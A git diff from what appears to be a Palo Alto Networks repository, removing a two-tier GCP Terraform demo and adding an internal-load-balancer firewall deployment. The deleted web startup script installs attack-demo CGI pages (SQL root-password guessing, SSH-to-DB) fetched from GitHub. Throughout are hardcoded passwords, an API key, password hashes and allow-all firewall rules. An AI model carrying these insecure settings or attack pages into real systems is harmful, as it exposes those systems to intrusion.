-} -resource "google_compute_firewall" "mgmt_vpc_egress" { - name = "mgmt-vpc-egress" - network = "${google_compute_network.mgmt.name}" - direction = "EGRESS" - destination_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "untrust_vpc_ingress" { - name = "untrust-vpc-ingress" - network = "${google_compute_network.untrust.name}" - direction = "INGRESS" - source_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "untrust_vpc_egress" { - name = "untrust-vpc-egress" - network = "${google_compute_network.untrust.name}" - direction = "EGRESS" - destination_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "web_vpc_ingress" { - name = "web-vpc-ingress" - network = "${google_compute_network.web.name}" - direction = "INGRESS" - source_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "web_vpc_egress" { - name = "web-vpc-egress" - network = "${google_compute_network.web.name}" - direction = "EGRESS" - destination_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "db_vpc_ingress" { - name = "db-vpc-ingress" - network = "${google_compute_network.db.name}" - direction = "INGRESS" - source_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "db_vpc_egress" { - name = "db-vpc-egress" - network = "${google_compute_network.db.name}" - direction = "EGRESS" - destination_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} - - -############################################################################################ -############################################################################################ -# CREATE VM-SERIES -resource "google_compute_instance" "firewall" { - name = "${var.fw_vm_name}" - machine_type = "${var.fw_machine_type}" - zone = "${var.zone}" - min_cpu_platform = "${var.fw_machine_cpu}" - can_ip_forward = true - allow_stopping_for_update = true - count = 1 - - metadata { - vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket}" - serial-port-enable = true - } - service_account { - scopes = "${var.fw_scopes}" - } - network_interface { - subnetwork = "${google_compute_subnetwork.mgmt_subnet.name}" - network_ip = "${var.fw_nic0_ip}" - access_config = {} - } - network_interface { - subnetwork = "${google_compute_subnetwork.untrust_subnet.name}" - network_ip = "${var.fw_nic1_ip}" - access_config = {} - } - network_interface { - subnetwork = "${google_compute_subnetwork.web_subnet.name}" - network_ip = "${var.fw_nic2_ip}" - } - network_interface { - subnetwork = "${google_compute_subnetwork.db_subnet.name}" - network_ip = "${var.fw_nic3_ip}" - } - boot_disk { - initialize_params { - image = "${var.fw_image}" - } - } - depends_on = [ - "google_storage_bucket.bootstrap", - "google_storage_bucket_object.bootstrap_xml", - "google_storage_bucket_object.init-cfg", - "google_storage_bucket_object.content", - "google_storage_bucket_object.license", - "google_storage_bucket_object.software", - ] -} - - -############################################################################################ -############################################################################################ -# CREATE DB SERVER -resource "google_compute_instance" "dbserver" { - name = "${var.db_vm_name}" - machine_type = "${var.db_machine_type}" - zone = "${var.zone}" - can_ip_forward = true - allow_stopping_for_update = true - count = 1 - metadata_startup_script = "${file("${path.module}/scripts/dbserver-startup.sh")}" - metadata { - serial-port-enable = true - sshKeys = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}" - } - network_interface { - subnetwork = "${google_compute_subnetwork.db_subnet.name}" - network_ip = "${var.db_nic0_ip}" - } - service_account { - scopes = "${var.vm_scopes}" - } - boot_disk { - initialize_params { - image = "${var.vm_image}" - } - } - depends_on = [ - "google_compute_instance.firewall", - "google_compute_subnetwork.mgmt_subnet", - "google_compute_subnetwork.untrust_subnet", - "google_compute_subnetwork.web_subnet", - "google_compute_subnetwork.db_subnet", - ] -} - - -############################################################################################ -############################################################################################ -# CREATE WEB SERVER -resource "google_compute_instance" "webserver" { - name = "${var.web_vm_name}" - machine_type = "${var.web_machine_type}" - zone = "${var.zone}" - can_ip_forward = true - allow_stopping_for_update = true - count = 1 - metadata_startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}" - metadata { - serial-port-enable = true - sshKeys = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}" - } - network_interface { - subnetwork = "${google_compute_subnetwork.web_subnet.name}" - network_ip = "${var.web_nic0_ip}" - } - boot_disk { - initialize_params { - image = "${var.vm_image}" - } - } - service_account { - scopes = "${var.vm_scopes}" - } - depends_on = [ - "google_compute_instance.firewall", - "google_compute_subnetwork.mgmt_subnet", - "google_compute_subnetwork.untrust_subnet", - "google_compute_subnetwork.web_subnet", - "google_compute_subnetwork.db_subnet", - ] -} - - -############################################################################################ -############################################################################################ -output "DEPLOYMENT STATUS" { - value = "COMPLETE" -} \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh deleted file mode 100644 index f618cd97..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh +++ /dev/null @@ -1,24 +0,0 @@ -#!/bin/bash -sudo exec > >(sudo tee /var/log/user-data.log|logger -t user-data -s 2> sudo /dev/console) 2>&1 -FW_NIC3="10.5.3.4" -while true - do - resp=$(curl -s -S -g -k "https://$FW_NIC3/api/?type=op&cmd=&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=") - echo $resp - if [[ $resp == *"[CDATA[yes"* ]] ; then - break - fi - sleep 10s - done -sudo apt-get update -sudo apt-get -y install debconf-utils -sudo DEBIAN_FRONTEND=noninteractive | apt-get install -y mysql-server -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1')" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User=''" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_localhost';" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;" -sudo sed -i "s/.*bind-address.*/bind-address = 0.0.0.0/" /etc/mysql/mysql.conf.d/mysqld.cnf -sudo systemctl restart mysql && sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE DATABASE Demo;" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE USER 'demouser'@'%' IDENTIFIED BY 'paloalto@123';" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "GRANT ALL PRIVILEGES ON Demo.* TO 'demouser'@'%';" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;" \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh deleted file mode 100644 index 02dd7129..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh +++ /dev/null @@ -1,42 +0,0 @@ -#! /bin/bash -exec > >(tee /var/log/user-data.log|logger -t user-data -s 2>/dev/console) 2>&1 -dbip="10.5.3.5" -FW_NIC2="10.5.2.4" -while true - do - resp=$(curl -s -S -g -k "https://$FW_NIC2/api/?type=op&cmd=&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=") - echo $resp - if [[ $resp == *"[CDATA[yes"* ]] ; then - break - fi - sleep 10s - done -apt-get update -apt-get install -y apache2 wordpress -ln -sf /usr/share/wordpress /var/www/html/wordpress -gzip -d /usr/share/doc/wordpress/examples/setup-mysql.gz -while true; do - resp=$(mysql -udemouser -ppaloalto@123 -h "$dbip" -e 'show databases') - echo "$resp" - if [[ "$resp" = *"Demo"* ]] - then - break - fi - sleep 5s -done -bash /usr/share/doc/wordpress/examples/setup-mysql -n Demo -t "$dbip" "$dbip" -sed -i "s/define('DB_USER'.*/define('DB_USER', 'demouser');/g" /etc/wordpress/config-"$dbip".php -sed -i "s/define('DB_PASSWORD'.*/define('DB_PASSWORD', 'paloalto@123');/g" /etc/wordpress/config-"$dbip".php -wget -O /usr/lib/cgi-bin/guess-sql-root-password.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/guess-sql-root-password.cgi -chmod +x /usr/lib/cgi-bin/guess-sql-root-password.cgi -sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/guess-sql-root-password.cgi -wget -O /usr/lib/cgi-bin/ssh-to-db.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/ssh-to-db.cgi -chmod +x /usr/lib/cgi-bin/ssh-to-db.cgi -sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/ssh-to-db.cgi -wget -O /var/www/html/showheaders.php https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/showheaders.php -wget -O /var/www/html/sql-attack.html https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/sql-attack.html -ln -sf /etc/apache2/conf-available/serve-cgi-bin.conf /etc/apache2/conf-enabled/serve-cgi-bin.conf -ln -sf /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load -sudo ln -s /etc/wordpress/config-"$dbip".php /etc/wordpress/config-default.php -systemctl restart apache2 - diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf deleted file mode 100644 index bb6e19f0..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf +++ /dev/null @@ -1,176 +0,0 @@ -/* -************************************************************************************************************* -** ** -** author: mmclimans ** -** date: 4/1/19 ** -** contact: mmclimans@paloaltonetworks.com ** -** ** -** SUPPORT POLICY ** -** ** -** This build is released under an as-is, best effort, support policy. ** -** These scripts should be seen as community supported and Palo Alto Networks will contribute our ** -** expertise as and when possible. We do not provide technical support or help in using or ** -** troubleshooting the components of the project through our normal support options such as ** -** Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support ** -** options. The underlying product used (the VM-Series firewall) by the scripts or templates are still ** -** supported, but the support is only for the product functionality and not for help in deploying or ** -** using the template or script itself. Unless explicitly tagged, all projects or work posted in our ** -** GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads ** -** page on https://support.paloaltonetworks.com are provided under the best effort policy. ** -** ** -************************************************************************************************************* -*/ - -variable "my_gcp_project" { - description = "Enter the Project ID of an existing GCP project:" - # default = "my-gcp-project-0000001" -} -variable "gcp_credentials_file" { - description = "Enter the JSON GCE API KEY for your environment (the json must exist in the main.tf directory)" - # default = "gcp-credentials.json" -} -variable "bootstrap_bucket" { - description = "Enter globally unique name for the new bootstrap bucket" - # default = "vmseries-2tier-75834523984575432" -} -variable "gcp_key_file" { - description = "Enter your public key (this is only required if you need to access the DB and WEB VMs):" - # default = "gcloudkey.pub" -} -variable "gcp_ssh_user" { - description = "Enter the username value associated with the GCP public key:" - default = "ubuntu" -} - -variable "fw_image" { - # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810" - # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-810" - default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814" -} -variable "region" { - description = "Enter the region to deploy the build:" - default = "us-east4" -} -variable "zone" { - description = "Enter the region's zone:" - default = "us-east4-a" -} - -/* -************************************************************************************************************* -** ** -** THE VARIABLES BELOW DO NOT BE CHANGED TO RUN THE TWO-TIER DEMO!!! ** -** ** -************************************************************************************************************* -*/ - -############################################################################################################# -# GCP VPC VARIABLES -variable "mgmt_vpc" { - default = "mgmt-vpc" -} -variable "mgmt_vpc_subnet" { - default = "mgmt-subnet" -} -variable "mgmt_vpc_subnet_cidr" { - default = "10.5.0.0/24" -} -variable "untrust_vpc" { - default = "untrust-vpc" -} -variable "untrust_vpc_subnet" { - default = "untrust-subnet" -} -variable "untrust_vpc_subnet_cidr" { - default = "10.5.1.0/24" -} -variable "web_vpc" { - default = "web-vpc" -} -variable "web_vpc_subnet" { - default = "web-subnet" -} -variable "web_vpc_subnet_cidr" { - default = "10.5.2.0/24" -} -variable "db_vpc" { - default = "db-vpc" -} -variable "db_vpc_subnet" { - default = "db-subnet" -} -variable "db_vpc_subnet_cidr" { - default = "10.5.3.0/24" -} -################################################################################################################ -################################################################################################################ -# VM-SERIES VM VARIABLES -variable "fw_vm_name" { - default = "vmseries-vm" -} -variable "fw_machine_type" { - default = "n1-standard-4" -} -variable "fw_machine_cpu" { - default = "Intel Skylake" -} -variable "fw_nic0_ip" { - default = "10.5.0.4" -} -variable "fw_nic1_ip" { - default = "10.5.1.4" -} -variable "fw_nic2_ip" { - default = "10.5.2.4" -} -variable "fw_nic3_ip" { - default = "10.5.3.4" -} -################################################################################################################ -################################################################################################################ -# WEB-VM VARIABLES -variable "web_vm_name" { - default = "web-vm" -} -variable "web_machine_type" { - default = "f1-micro" -} -variable "web_nic0_ip" { - default = "10.5.2.5" -} -################################################################################################################ -################################################################################################################ -# DB-VM VARIABLES -variable "db_vm_name" { - default = "db-vm" -} -variable "db_machine_type" { - default = "f1-micro" -} -variable "db_nic0_ip" { - default = "10.5.3.5" -} -variable "vm_image" { - default = "ubuntu-os-cloud/ubuntu-1804-lts" -} -################################################################################################################ -################################################################################################################ -variable "fw_scopes" { - default = [ - "https://www.googleapis.com/auth/cloud.useraccounts.readonly", - "https://www.googleapis.com/auth/devstorage.read_only", - "https://www.googleapis.com/auth/logging.write", - "https://www.googleapis.com/auth/monitoring.write", - ] -} - -variable "vm_scopes" { - default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly", - "https://www.googleapis.com/auth/devstorage.read_only", - "https://www.googleapis.com/auth/logging.write", - "https://www.googleapis.com/auth/monitoring.write", - "https://www.googleapis.com/auth/compute.readonly", - ] -} - - diff --git a/gcp/ilbnh-mig/README.md b/gcp/ilbnh-mig/README.md new file mode 100644 index 00000000..e617ff44 --- /dev/null +++ b/gcp/ilbnh-mig/README.md @@ -0,0 +1,76 @@ +## MultiNic ILB Deployment +This is a Terraform version of the manual build described at: +https://cloud.google.com/load-balancing/docs/internal/setting-up-ilb-next-hop + +Terraform creates a VM-Series firewall that secures egress and east-west traffic for 2 internal VPCs. Egress traffic from the internal VPCs is routed via the Load Balancer as Next Hop to the VM-Series. The FW is deployed via a Managed Instance Group to allow for automatic failure detection/repacement. + +### Overview +* 4 x VPCs (testing,management,production, production2) +* 1 x VM-Series (BYOL / Bundle1 / Bundle2) in a Managed Instance Group +* 1 x Ubuntu VM in the testing VPC (install Apache during creation) +* 1 x Ubuntu VM in the production VPC (install Apache during creation) +* 1 x GCP Internal Load Balancer in the testing VPC +* 1 x GCP Internal Load Balancer in the production VPC +* 1 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness) +
+

+ +

+ + +### Prerequistes +1. Terraform +2. Access to GCP Console + +After deployment, the firewalls' username and password are: + * **Username:** paloalto + * **Password:** Pal0Alt0@123 + +### Deployment +1. Download the **ilbnh-mig** repo to the machine running the build +2. In an editor, open **terraform.tfvars** and set values for the following variables + +| Variable | Description | +| :------------- | :------------- | +| `project_id` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. | +| `public_key_path` | Public key used to authenticate to the FW (username: admin) and the Ubuntu VMs (username:demo) | +| `fw_panos` | The species and version of the FW to deploy | +| `auth_file`| Authentication key file for deployment | + +3. Download project authenication key files to the main directory of the terraform build. +

+ +

+ +4. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +5. After the deployment finishes, navigate to the console and not the public IP address associated with one of the ubuntu servers. + +

+ +

+ +6. Connect to the server and issue the curl command to its peer. + +

+ +

+ +7. Login to the FW and note the traffic logs. +

+ +

+ +8. Destroy the envirnment when done. +``` +$ terraform destroy +``` + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/ilbnh-mig/bootstrap_files/authcodes b/gcp/ilbnh-mig/bootstrap_files/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/ilbnh-mig/bootstrap_files/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..a354ec4f --- /dev/null +++ b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml @@ -0,0 +1,1099 @@ + + + + + + + + yes + + + $1$swuuvbfr$TeXPJ5vj8FQP5E9NiByN40 + + + + + yes + + + $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ. + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDblNZOFdJbktrdGhVZnExdjFoSnlWdHhCSEpTYlRWQnhTTFBwYXg3MGUwRW5sZVZkdGk0VURLUFplREpQMVVxWjNYWjZIblk0L1NzQnhocFFXeW1LenpNYURqVnZ3TWhtcm04ampXYndRYXlqdEk4UVl0SnZNa1RhcHYwT2hWZTBmUUM5VXdTTnFHZ2FTKzVnUGdJRWVPaTB0a01OeU10VjY2bmhCL05ubktqc3RLSnoxYmt5K3RPUnQyeWNvYmdZWVJMdytRdWVLYmpHTkxFSTcrWkp5ak5URm8rUFAyaFZ4Q3hJL2ZzTnpvcTFjNjgyOXVkcmhwOUZsODhqbGNPSFdsYTUrMnRXS0VNVVRrKzY5eXZ3TmhrL3lvZ2F5VUFZZTJROXpEOG9pb2RzVnZSV29VOTk3dmt6TFE3c3FHT0VTYzk5a0xJTzFWaGtGalZHTDExSnogc3R1ZGVudC0wMy0wYWQ5MTllODQ2NmJAcXdpa2xhYnMubmV0 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + 1460 + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + hc-tcp-22 + + + + no + + + + + hc-tcp-22 + + + + no + + + + + hc-tcp-22 + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + loopback.1 + + + + + + + + + + + + 10.30.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + Health-Check-Probe1 + + + + + + + 10.30.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + Health-Check-Probe2 + + + + + + + no + any + 2 + + + trust2 + + + None + + 10 + 10.50.1.0/24 + + + + + + + no + any + 2 + + + trust3 + + + None + + 10 + 10.40.1.0/24 + + + + + + + + + + + + + + + + + + + yes + + + no + + + no + + + no + + + no + + + + + + + + 10.50.1.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + Health-Check-Probe1 + + + + + + + 10.50.1.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + Health-Check-Probe2 + + + + + + + no + any + 2 + + + trust1 + + + None + + 10 + 10.30.1.0/24 + + + + + + + no + any + 2 + + + trust3 + + + None + + 10 + 10.40.1.0/24 + + + + + + + + + 120 + + + ethernet1/2 + loopback.2 + + + + + + + + + + + + + yes + + + no + + + no + + + no + + + no + + + + + + + + 10.40.1.1 + + + None + + + no + any + 2 + + ethernet1/3 + 10 + Health-Check-Probe1 + + + + + + + 10.40.1.1 + + + None + + + no + any + 2 + + ethernet1/3 + 10 + Health-Check-Probe2 + + + + + + + no + any + 2 + + + trust1 + + + None + + 10 + 10.30.1.0/24 + + + + + + + no + any + 2 + + + trust2 + + + None + + 10 + 10.50.1.0/24 + + + + + + + + + ethernet1/3 + loopback.3 + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + no + + Multi-Nic-ILB + + + yes + no + no + no + + + yes + + + + + yes + 1 + + + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDblNZOFdJbktrdGhVZnExdjFoSnlWdHhCSEpTYlRWQnhTTFBwYXg3MGUwRW5sZVZkdGk0VURLUFplREpQMVVxWjNYWjZIblk0L1NzQnhocFFXeW1LenpNYURqVnZ3TWhtcm04ampXYndRYXlqdEk4UVl0SnZNa1RhcHYwT2hWZTBmUUM5VXdTTnFHZ2FTKzVnUGdJRWVPaTB0a01OeU10VjY2bmhCL05ubktqc3RLSnoxYmt5K3RPUnQyeWNvYmdZWVJMdytRdWVLYmpHTkxFSTcrWkp5ak5URm8rUFAyaFZ4Q3hJL2ZzTnpvcTFjNjgyOXVkcmhwOUZsODhqbGNPSFdsYTUrMnRXS0VNVVRrKzY5eXZ3TmhrL3lvZ2F5VUFZZTJROXpEOG9pb2RzVnZSV29VOTk3dmt6TFE3c3FHT0VTYzk5a0xJTzFWaGtGalZHTDExSnogc3R1ZGVudC0wMy0wYWQ5MTllODQ2NmJAcXdpa2xhYnMubmV0 + + + yes + no + no + no + + + multi-nic-ilb + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + loopback.1 + + + + + + + ethernet1/2 + loopback.2 + + + + + + + ethernet1/3 + loopback.3 + + + + + + + + + 22 + + + + + + + 221 + + + + + + + 222 + + + + + + + + + + + + any + + + Trust1 + Trust2 + + + Health-Check-Group + + + any + + + any + + + any + + + any + + + application-default + + + any + + allow + no + no + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + application-default + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + Trust1 + + + any + + + Testing Network + + + any + + any + no + + + + + + ethernet1/2 + + + + + Trust2 + + + any + + + Production Network + + + any + + any + no + + + + + + + deny + yes + yes + + + allow + yes + yes + + + + + + + + + + + any + + + any + + + critical + + any + client + any + disable + + + + + + + any + + + any + + + high + + any + client + any + disable + + + + + + + any + + + any + + + medium + + any + client + any + disable + + + + + + + any + + + any + + + critical + + any + server + any + disable + + + + + + + any + + + any + + + high + + any + server + any + disable + + + + + + + any + + + any + + + medium + + any + server + any + disable + + + + + + + + + + + + + WW's profile + + + + + +
+ + 35.191.0.0/16 + + + 130.211.0.0/22 + + + 10.50.1.0/24 + + + 10.30.1.0/24 + +
+ + + + ethernet1/1 + loopback.1 + ethernet1/2 + loopback.2 + ethernet1/3 + loopback.3 + + + + + + + Health-Check-Probe1 + Health-Check-Probe2 + + + +
+
+
+
+
diff --git a/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..5b9c168b --- /dev/null +++ b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=packet-mirroring +op-command-modes=mgmt-interface-swap +dns-primary= +dns-secondary= \ No newline at end of file diff --git a/gcp/ilbnh-mig/fw_common.tf b/gcp/ilbnh-mig/fw_common.tf new file mode 100644 index 00000000..aeaa685c --- /dev/null +++ b/gcp/ilbnh-mig/fw_common.tf @@ -0,0 +1,106 @@ +#----------------------------------------------------------------------------------------------- +# Create bootstrap bucket for firewalls +module "bootstrap_common" { + source = "./modules/gcp_bootstrap/" + bucket_name = "fw-bootstrap-common" + file_location = "bootstrap_files/" + config = ["init-cfg.txt", "bootstrap.xml"] +# config = ["init-cfg.txt"] + license = ["authcodes"] +} + +#----------------------------------------------------------------------------------------------- +# Create firewall template +#----------------------------------------------------------------------------------------------- +module "fw_common" { + source = "./modules/vmseries/" + base_name = var.fw_base_name + region = var.region + target_size = var.target_size + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + networks = [ + module.vpc0.network_self_link, + module.vpc1.network_self_link, + module.vpc2.network_self_link, + module.vpc3.network_self_link + ] + subnetworks = [ + module.vpc0.subnetwork_self_link, + module.vpc1.subnetwork_self_link, + module.vpc2.subnetwork_self_link, + module.vpc3.subnetwork_self_link + ] + machine_type = var.fw_machine_type + bootstrap_bucket = module.bootstrap_common.bucket_name + mgmt_interface_swap = "enable" + ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : "" + image = "${var.fw_image}-${var.fw_panos}" + nic0_public_ip = false + nic1_public_ip = true + nic2_public_ip = false + nic3_public_ip = false + create_instance_group = true + + dependencies = [ + module.bootstrap_common.completion, + ] +} + +resource "google_compute_health_check" "hc_ssh_22" { + name = "hc-ssh-22" + + tcp_health_check { + port = var.health_check_port + } +} + +module "ilb1" { + source = "./modules/ilbnh/" + name = "ilb1" + project_id = var.project_id + all_ports = true + ports = [] + health_checks = [google_compute_health_check.hc_ssh_22.self_link] + region = var.region + network = module.vpc0.vpc_id + network_uri = module.vpc0.network_self_link + subnetwork = module.vpc0.subnetwork_self_link + ip_address = var.ilb1_ip + group = module.fw_common.vmseries_rigm +} + +module "ilb2" { + source = "./modules/ilbnh/" + name = "ilb2" + project_id = var.project_id + all_ports = true + ports = [] + health_checks = [google_compute_health_check.hc_ssh_22.self_link] + region = var.region + network = module.vpc2.vpc_id + network_uri = module.vpc2.network_self_link + subnetwork = module.vpc2.subnetwork_self_link + ip_address = var.ilb2_ip + group = module.fw_common.vmseries_rigm + } + +#----------------------------------------------------------------------------------------------- +# Create routes route to internal LBs. +resource "google_compute_route" "ilb_nhop_dest_10_30_1" { + name = "ilb-nhop-dest-10-30-1" + dest_range = "10.30.1.0/24" + network = module.vpc2.network_self_link + next_hop_ilb = module.ilb2.forwarding_rule + priority = 99 +} + +resource "google_compute_route" "ilb_nhop_dest_10_50_1" { + name = "ilb-nhop-dest-10-50-1" + dest_range = "10.50.1.0/24" + network = module.vpc0.network_self_link + next_hop_ilb = module.ilb1.forwarding_rule + priority = 99 +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/fw_vpc.tf b/gcp/ilbnh-mig/fw_vpc.tf new file mode 100644 index 00000000..230a66c0 --- /dev/null +++ b/gcp/ilbnh-mig/fw_vpc.tf @@ -0,0 +1,40 @@ +#----------------------------------------------------------------------------------------------- +# Create firewall VPCs & subnets +module "vpc0" { + source = "./modules/vpc/" + vpc = var.vpc0 + subnet = var.vpc0_subnet + cidr = var.vpc0_cidr + region = var.region + allowed_sources = ["0.0.0.0/0"] +} + +module "vpc1" { + source = "./modules/vpc/" + vpc = var.vpc1 + subnet = var.vpc1_subnet + cidr = var.vpc1_cidr + region = var.region + allowed_sources = var.mgmt_sources + allowed_protocol = "TCP" + allowed_ports = ["443", "22"] +} + +module "vpc2" { + source = "./modules/vpc/" + vpc = var.vpc2 + subnet = var.vpc2_subnet + cidr = var.vpc2_cidr + region = var.region + allowed_sources = ["0.0.0.0/0"] +} + +module "vpc3" { + source = "./modules/vpc/" + vpc = var.vpc3 + subnet = var.vpc3_subnet + cidr = var.vpc3_cidr + region = var.region + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} diff --git a/gcp/ilbnh-mig/images/curl.png b/gcp/ilbnh-mig/images/curl.png new file mode 100644 index 00000000..e17b875c Binary files /dev/null and b/gcp/ilbnh-mig/images/curl.png differ diff --git a/gcp/ilbnh-mig/images/deployment.png b/gcp/ilbnh-mig/images/deployment.png new file mode 100644 index 00000000..636f95d1 Binary files /dev/null and b/gcp/ilbnh-mig/images/deployment.png differ diff --git a/gcp/ilbnh-mig/images/diagram.svg b/gcp/ilbnh-mig/images/diagram.svg new file mode 100644 index 00000000..d68679f4 --- /dev/null +++ b/gcp/ilbnh-mig/images/diagram.svg @@ -0,0 +1,805 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Produced by OmniGraffle 7.9.4 + 2019-11-05 23:49:25 +0000 + + + ilb-as-next-hop + + Layer 1 + + + + + + + + + + Configuration + + + + + + Connectivity + + + + + + + + + + + + GCP Zone + + + + + Page-1 + + Shape + + + + Shape + + + + Shape + + + + Shape + + + Oval + + + + + GCP logo + + Fill-3 + + + + Fill-5 + + + + Fill-7 + + + + Fill-8 + + + + Fill-9 + + + + Fill-10 + + + + Fill-11 + + + + Fill-12 + + + + Fill-13 + + + + Fill-14 + + + + Fill-15 + + + + Fill-16 + + + + Fill-17 + + + + 